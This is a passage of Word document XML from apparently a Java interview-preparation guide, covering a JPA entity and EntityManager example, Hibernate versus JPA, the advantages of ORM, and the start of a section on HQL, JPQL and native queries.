    <w:p w14:paraId="6D907898"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able(name = "product")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6F5947"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ublic class Product {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC0CE95"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC22983"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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BF31F9"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BECFDD0"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD20507"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ivate double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D17D01B" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159791AC"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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC42AE"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B570D30" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2023"/>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Using JPA EntityManager</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A1CD92"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ublic class JpaExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B58196D"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD45E0F"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EntityManagerFactory emf = Persistence.createEntityManagerFactory("myJpaUnit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57296234"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EntityManager em = emf.createEntityManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A94F5D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5680E6"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549BB06D"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Begin transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC1A44"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em.getTransaction().begin();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78188648"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE4616E"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Create new product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577A9ABE"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Product tempProduct = new Product("Laptop", 1000.00);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158F4670"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E013E"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Save product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D27719"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em.persist(tempProduct);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132FD02D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C521CE0"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Commit transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A7EA3"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em.getTransaction().commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A491513"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 finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA35EB"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            em.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3652C"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emf.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073CF293"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48329D9C"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D549F4"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0982FF25" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C"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Key Differences Between Using Hibernate and JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0182D855" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2024"/>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Abstraction</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JPA is an abstraction over the underlying ORM framework (like Hibernate). Hibernate can be used directly for more advanced or specific configurations, but JPA provides a more standardized API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B1D69A" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2024"/>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Vendor Independence</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JPA allows you to switch between different JPA providers (e.g., Hibernate, EclipseLink) without changing much of the code, whereas Hibernate alone is tightly coupled to its own API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28827B62" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2024"/>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EntityManager vs. Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With JPA, you use EntityManager to perform database operations, while Hibernate uses Session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C42EBD" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7141D978" w14:textId="77777777" w:rsidR="00FA1F6C" w:rsidRPr="007F3379" w:rsidRDefault="00FA1F6C"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Yes, Hibernate can be used independently without JPA, as Hibernate is a full-fledged ORM framework on its own. However, JPA provides a standard API for ORM in Java, and Hibernate is one of the most popular JPA implementations. Hibernate without JPA offers greater flexibility and allows you to use Hibernate-specific features directly, while JPA abstracts away some of the Hibernate-specific features and offers a more vendor-neutral approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540C02B" w14:textId="485BA6D7" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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375C6E2">
          <v:rect id="_x0000_i2465" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="326D9F7D" w14:textId="5867D662" w:rsidR="00B62C20" w:rsidRPr="00CE4B95" w:rsidRDefault="00C90147">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="560" w:name="_Toc196308040"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the advantages of ORM</w:t>
      </w:r>
      <w:r w:rsidR="00B62C20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="560"/>
    </w:p>
    <w:p w14:paraId="16B6FA55" w14:textId="767A3D64" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Advantages of ORM (Object-Relational Mapping):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE4295" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Abstraction of Database Interactions</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3D0E58" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM abstracts the complexities of database interactions by mapping Java objects to database tables. Developers can work with objects in Java code without worrying about low-level SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C12FF" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Improved Productivity</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10518FFD" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM frameworks (like Hibernate, JPA) generate SQL queries automatically based on object models, reducing the need for repetitive SQL code and improving developer productivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D9E1A" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Portability</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976FFF9" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM provides database portability because it abstracts database-specific details. Changing databases (e.g., from MySQL to PostgreSQL) may only require changes in configuration, without the need to rewrite code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2546B399" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Simplified Data Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2464BAA4" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM allows seamless conversion between Java objects and relational database entities, making it easier to manipulate data in Java objects rather than dealing with result sets from SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758F90C" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B572889" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ith ORM, the codebase is cleaner and easier to maintain. Since Java objects and database tables are mapped, the code is more consistent, and developers can work with a higher-level abstraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BAEE2F" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Reduced Boilerplate Code</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33502F75" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM eliminates the need for writing boilerplate code for database operations like connecting to the database, handling exceptions, and managing connections. ORM handles most of this automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26395FB1" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Improved Security</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218C805" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM frameworks provide built-in protection against SQL injection attacks because they use parameterized queries. The query generation is automatic and ensures that user inputs are correctly sanitized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE1C92" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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aching Mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175ABBB9" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM frameworks like Hibernate provide built-in caching mechanisms (L1 and L2 cache), which can improve performance by reducing database load and speeding up data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE078E6" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548ACBD5" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM frameworks integrate with transaction management mechanisms, allowing for better handling of transactional integrity. They support ACID properties (Atomicity, Consistency, Isolation, Durability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA9C61" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Object-Oriented Approach</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E3045" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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lastRenderedPageBreak/>
        <w:t>ORM enables an object-oriented approach to database design, making it easier to represent relationships between entities using objects and their associations (e.g., one-to-many, many-to-many) rather than relational database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485EAACC" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Query Language (HQL, JPQL)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB24F4" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM frameworks like Hibernate and JPA provide high-level query languages (HQL, JPQL), which allow querying data without writing native SQL. These languages are easier to use and integrate better with Java code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7655A477" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Lazy Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9364F0" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM frameworks often support lazy loading, allowing related objects to be loaded only when required. This can optimize memory usage and performance by avoiding unnecessary data fetches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079420D6" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Automatic Table Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC5675" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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ORM frameworks can automatically generate database schema based on Java class annotations, saving time during database setup and ensuring synchronization between the model and the database schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4DA07E" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Relationship Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5912E161" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2025"/>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ORM frameworks provide mechanisms to easily map relationships between entities (e.g., one-to-many, many-to-many), which would otherwise require complex SQL joins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D3DC0" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="007F3379" w:rsidRDefault="00CC7822"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4816BDB9" w14:textId="77777777" w:rsidR="00CC7822" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7822" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ORM simplifies and accelerates database-related development by allowing developers to interact with databases through Java objects, automating many tedious tasks and reducing the chance for errors. It improves productivity, portability, maintainability, and security while providing powerful features like caching and transaction management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986286F" w14:textId="0339AEFE" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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ACA054A">
          <v:rect id="_x0000_i2466" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A3E78" w14:textId="7CABB672" w:rsidR="00CC7822" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7822" w:rsidP="00CC7822">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="561" w:name="_Toc196308041"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HQL, JPQL and Native query?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="561"/>
    </w:p>
    <w:p w14:paraId="69C9E4FC" w14:textId="4370F6B6" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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 xml:space="preserve">The main differences between </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HQL (Hibernate Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL (Java Persistence Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Native Query</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are related to their origins, syntax, and the context in which they are used. Here's a breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01628C84" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74"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1. HQL (Hibernate Query Language):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB545D2" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202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Definition</w:t>
